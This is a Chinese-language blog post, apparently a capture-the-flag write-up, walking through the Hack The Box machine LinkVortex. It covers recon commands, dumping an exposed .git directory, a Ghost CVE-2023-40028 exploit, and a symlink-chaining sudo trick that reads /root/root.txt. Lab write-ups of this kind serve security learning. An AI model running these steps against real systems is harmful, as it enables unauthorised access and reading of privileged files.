<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="google-site-verification" content="FVeTimbT1kTEtyy7CZnjl87tv6Zu3gYnjspaqbsrZ6M" />
    <meta name="baidu-site-verification" content="codeva-4fIoJmJzzi" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="端口扫描123nmap -sCV -A -T4 10.10.11.47   可以发现扫到了域名，那么就是写入hosts 子域名爆破123ffuf -w &#x2F;usr&#x2F;share&#x2F;dnsrecon&#x2F;dnsrecon&#x2F;data&#x2F;subdomains-top1mil-20000.txt -u http:&#x2F;&#x2F;linkvortex.htb&#x2F; -H &quot;Host:FUZZ.linkvortex.htb&amp;q">
<meta property="og:type" content="article">
<meta property="og:title" content="LinkVortex">
<meta property="og:url" content="https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/index.html">
<meta property="og:site_name" content="Oceanzbz&#39;s Blog">
<meta property="og:description" content="端口扫描123nmap -sCV -A -T4 10.10.11.47   可以发现扫到了域名，那么就是写入hosts 子域名爆破123ffuf -w &#x2F;usr&#x2F;share&#x2F;dnsrecon&#x2F;dnsrecon&#x2F;data&#x2F;subdomains-top1mil-20000.txt -u http:&#x2F;&#x2F;linkvortex.htb&#x2F; -H &quot;Host:FUZZ.linkvortex.htb&amp;q">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://image.baidu.com/search/down?url=https://cdn.nlark.com/yuque/0/2024/png/25729212/1733892650939-385f482c-2c18-4ad8-9c59-1c9ac19e1533.png">
<meta property="og:image" content="https://image.baidu.com/search/down?url=https://cdn.nlark.com/yuque/0/2024/png/25729212/1733892861174-e6fca4da-4071-411f-b953-936e1200e7f1.png">
<meta property="og:image" content="https://image.baidu.com/search/down?url=https://cdn.nlark.com/yuque/0/2024/png/25729212/1733892976586-85d197dd-e24b-4c89-b374-fe08873ddd13.png">
<meta property="og:image" content="https://image.baidu.com/search/down?url=https://cdn.nlark.com/yuque/0/2024/png/25729212/1733893029816-e9b61ff2-8579-4625-a59a-e6c636b6f8be.png">
<meta property="og:image" content="https://image.baidu.com/search/down?url=https://cdn.nlark.com/yuque/0/2024/png/25729212/1733893317099-c48f3b45-bc0e-4d92-ac7a-978a731d2a57.png">
<meta property="og:image" content="https://image.baidu.com/search/down?url=https://cdn.nlark.com/yuque/0/2024/png/25729212/1733906422060-c7e6085e-5eb3-4302-9d39-3c0cc6dc1862.png">
<meta property="article:published_time" content="2024-12-30T07:24:38.000Z">
<meta property="article:modified_time" content="2025-03-05T07:24:36.811Z">
<meta property="article:author" content="Oceanzbz">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="HTB">
<meta property="article:tag" content="Linux">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://image.baidu.com/search/down?url=https://cdn.nlark.com/yuque/0/2024/png/25729212/1733892650939-385f482c-2c18-4ad8-9c59-1c9ac19e1533.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>LinkVortex</title>
    <!-- async scripts -->
    <!-- Google Analytics -->

  <script async src="https://www.googletagmanager.com/gtag/js?id=G-QWTJSPQL4F"></script>
  <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'G-QWTJSPQL4F');
  </script>


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/atom.xml" title="Oceanzbz&#39;s Blog" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/link/">Friends</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/Sea/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/Cicada/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&text=LinkVortex"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&title=LinkVortex"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&is_video=false&description=LinkVortex"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=LinkVortex&body=Check out this article: https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&title=LinkVortex"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&title=LinkVortex"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&title=LinkVortex"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&title=LinkVortex"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&name=LinkVortex&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&t=LinkVortex"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">1.</span> <span class="toc-text">端口扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%90%E5%9F%9F%E5%90%8D%E7%88%86%E7%A0%B4"><span class="toc-number">2.</span> <span class="toc-text">子域名爆破</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F"><span class="toc-number">3.</span> <span class="toc-text">目录扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Git%E6%B3%84%E6%BC%8F"><span class="toc-number">4.</span> <span class="toc-text">Git泄漏</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CVE-CVE-2023-40028"><span class="toc-number">5.</span> <span class="toc-text">CVE-CVE-2023-40028</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        LinkVortex
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Oceanzbz</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-12-30T07:24:38.000Z" class="dt-published" itemprop="datePublished">2024-12-30</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/">攻防渗透</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/HTB/" rel="tag">HTB</a>, <a class="p-category" href="/tags/Linux/" rel="tag">Linux</a>, <a class="p-category" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">nmap -sCV -A -T4 10.10.11.47</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://image.baidu.com/search/down?url=https://cdn.nlark.com/yuque/0/2024/png/25729212/1733892650939-385f482c-2c18-4ad8-9c59-1c9ac19e1533.png"></p>
<p>可以发现扫到了域名，那么就是写入hosts</p>
<h2 id="子域名爆破"><a href="#子域名爆破" class="headerlink" title="子域名爆破"></a>子域名爆破</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">ffuf -w /usr/share/dnsrecon/dnsrecon/data/subdomains-top1mil-20000.txt -u http://linkvortex.htb/ -H <span class="string">&quot;Host:FUZZ.linkvortex.htb&quot;</span> -mc 200</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>ffuf工具用法参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44288604/article/details/128444485">https://blog.csdn.net/weixin_44288604&#x2F;article&#x2F;details&#x2F;128444485</a></p>
<p><img src="https://image.baidu.com/search/down?url=https://cdn.nlark.com/yuque/0/2024/png/25729212/1733892861174-e6fca4da-4071-411f-b953-936e1200e7f1.png"></p>
<p>扫描出一个dev子域名同样也加入到hosts里面</p>
<h2 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">dirsearch -u http://linkvortex.htb/</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>扫描出来有个robots.txt</p>
<p><img src="https://image.baidu.com/search/down?url=https://cdn.nlark.com/yuque/0/2024/png/25729212/1733892976586-85d197dd-e24b-4c89-b374-fe08873ddd13.png"></p>
<p>看到有个ghost进去看看发现是个登录页面，所以需要找到账户和密码，再去扫描子域名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">dirsearch -u http://dev.linkvortex.htb/</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://image.baidu.com/search/down?url=https://cdn.nlark.com/yuque/0/2024/png/25729212/1733893029816-e9b61ff2-8579-4625-a59a-e6c636b6f8be.png"></p>
<p>发现了git泄漏</p>
<h2 id="Git泄漏"><a href="#Git泄漏" class="headerlink" title="Git泄漏"></a>Git泄漏</h2><p>直接用githack</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">python2 GitHack.py http://dev.linkvortex.htb/.git/</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://image.baidu.com/search/down?url=https://cdn.nlark.com/yuque/0/2024/png/25729212/1733893317099-c48f3b45-bc0e-4d92-ac7a-978a731d2a57.png"></p>
<p>可以在里面找到登录的用户名密码</p>
<h2 id="CVE-CVE-2023-40028"><a href="#CVE-CVE-2023-40028" class="headerlink" title="CVE-CVE-2023-40028"></a>CVE-CVE-2023-40028</h2><p>这里就是漏洞脚本主要就是改里面的地址就可以了</p>
<p><img src="https://image.baidu.com/search/down?url=https://cdn.nlark.com/yuque/0/2024/png/25729212/1733906422060-c7e6085e-5eb3-4302-9d39-3c0cc6dc1862.png"></p>
<p>然后看docker里的文件能看到ssh用户密码</p>
<p>连上之后sudo -l</p>
<p>检查 Bob 的命令权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">bob@linkvortex:~$ sudo -l</span><br><span class="line"></span><br><span class="line">Matching Defaults entries for bob on linkvortex:</span><br><span class="line"></span><br><span class="line">env_reset, mail_badpass,</span><br><span class="line"></span><br><span class="line">secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty,</span><br><span class="line"></span><br><span class="line">env_keep+=CHECK_CONTENT</span><br><span class="line"></span><br><span class="line">User bob may run the following commands on linkvortex:</span><br><span class="line"></span><br><span class="line">(ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>查看这个 <code>/opt/ghost/clean_symlink.sh</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">bob@linkvortex:~$ cat /opt/ghost/clean_symlink.sh</span><br><span class="line"></span><br><span class="line">#!/bin/bash</span><br><span class="line"></span><br><span class="line">QUAR_DIR=&quot;/var/quarantined&quot;</span><br><span class="line"></span><br><span class="line">if [ -z $CHECK_CONTENT ];then</span><br><span class="line"></span><br><span class="line">CHECK_CONTENT=false</span><br><span class="line"></span><br><span class="line">fi</span><br><span class="line"></span><br><span class="line">LINK=$1</span><br><span class="line"></span><br><span class="line">if ! [[ &quot;$LINK&quot; =~ \.png$ ]]; then</span><br><span class="line"></span><br><span class="line">/usr/bin/echo &quot;! First argument must be a png file !&quot;</span><br><span class="line"></span><br><span class="line">exit 2</span><br><span class="line"></span><br><span class="line">fi</span><br><span class="line"></span><br><span class="line">if /usr/bin/sudo /usr/bin/test -L $LINK;then</span><br><span class="line"></span><br><span class="line">LINK_NAME=$(/usr/bin/basename $LINK)</span><br><span class="line"></span><br><span class="line">LINK_TARGET=$(/usr/bin/readlink $LINK)</span><br><span class="line"></span><br><span class="line">if /usr/bin/echo &quot;$LINK_TARGET&quot; | /usr/bin/grep -Eq &#x27;(etc|root)&#x27;;then</span><br><span class="line"></span><br><span class="line">/usr/bin/echo &quot;! Trying to read critical files, removing link [ $LINK ] !&quot;</span><br><span class="line"></span><br><span class="line">/usr/bin/unlink $LINK</span><br><span class="line"></span><br><span class="line">else</span><br><span class="line"></span><br><span class="line">/usr/bin/echo &quot;Link found [ $LINK ] , moving it to quarantine&quot;</span><br><span class="line"></span><br><span class="line">/usr/bin/mv $LINK $QUAR_DIR/</span><br><span class="line"></span><br><span class="line">if $CHECK_CONTENT;then</span><br><span class="line"></span><br><span class="line">/usr/bin/echo &quot;Content:&quot;</span><br><span class="line"></span><br><span class="line">/usr/bin/cat $QUAR_DIR/$LINK_NAME 2&gt;/dev/null</span><br><span class="line"></span><br><span class="line">fi</span><br><span class="line"></span><br><span class="line">fi</span><br><span class="line"></span><br><span class="line">fi</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>如果文件名后缀是</strong>** <strong><code>**.png**</code><strong>，并且文件是符号链接</strong>，且目标路径 <strong>不包含</strong></strong> <strong><code>**etc**</code></strong> <strong><strong>或</strong></strong> **<code>**root**</code>（即目标不是敏感文件），脚本会：</p>
<ul>
<li><p>将符号链接 <strong>移动到</strong>** **<code>**/var/quarantined**</code> 目录。</p>
</li>
<li><p>如果 <code>CHECK_CONTENT=true</code>，脚本会尝试输出该文件的内容。</p>
</li>
</ul>
<p>然后创建符号链接，连接到 root.txt 下，由于脚本会检查参数，可以使用二次链接来进行绕过，同时将 <code>CHECK_CONTENT</code> 设置为 true</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">bob@linkvortex:~$ ln -s /root/root.txt hyh.txt</span><br><span class="line"></span><br><span class="line">bob@linkvortex:~$ ln -s /home/bob/hyh.txt hyh.png</span><br><span class="line"></span><br><span class="line">bob@linkvortex:~$ sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/hyh.png</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>参考：<a target="_blank" rel="noopener" href="https://www.hyhforever.top/htb-linkvortex/">https://www.hyhforever.top/htb-linkvortex/</a></p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
          <li><a href="/tags/">Tag</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/link/">Friends</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">1.</span> <span class="toc-text">端口扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%90%E5%9F%9F%E5%90%8D%E7%88%86%E7%A0%B4"><span class="toc-number">2.</span> <span class="toc-text">子域名爆破</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F"><span class="toc-number">3.</span> <span class="toc-text">目录扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Git%E6%B3%84%E6%BC%8F"><span class="toc-number">4.</span> <span class="toc-text">Git泄漏</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CVE-CVE-2023-40028"><span class="toc-number">5.</span> <span class="toc-text">CVE-CVE-2023-40028</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&text=LinkVortex"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&title=LinkVortex"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&is_video=false&description=LinkVortex"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=LinkVortex&body=Check out this article: https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&title=LinkVortex"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&title=LinkVortex"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&title=LinkVortex"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&title=LinkVortex"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&name=LinkVortex&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://oceanzbz.cn/2024/12/30/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/HTB/LinkVortex/&t=LinkVortex"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    Oceanzbz
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/link/">Friends</a></li><!--
     -->
      </ul>
      <ul>
        
          <!-- 不蒜子统计 -->
          <span id="busuanzi_container_site_pv">
              本站总访问量<span id="busuanzi_value_site_pv"></span>次
          </span>
          <span class="post-meta-divider">|</span>
          <span id="busuanzi_container_site_uv" style='display:none'>
                  本站访客数<span id="busuanzi_value_site_uv"></span>人
          </span>
          <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        
      </ul>
    </nav>
  </div>
  <script async src="https://www.googletagmanager.com/gtag/js?id=G-QWTJSPQL4F"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-QWTJSPQL4F');
</script>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'cactus-1';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
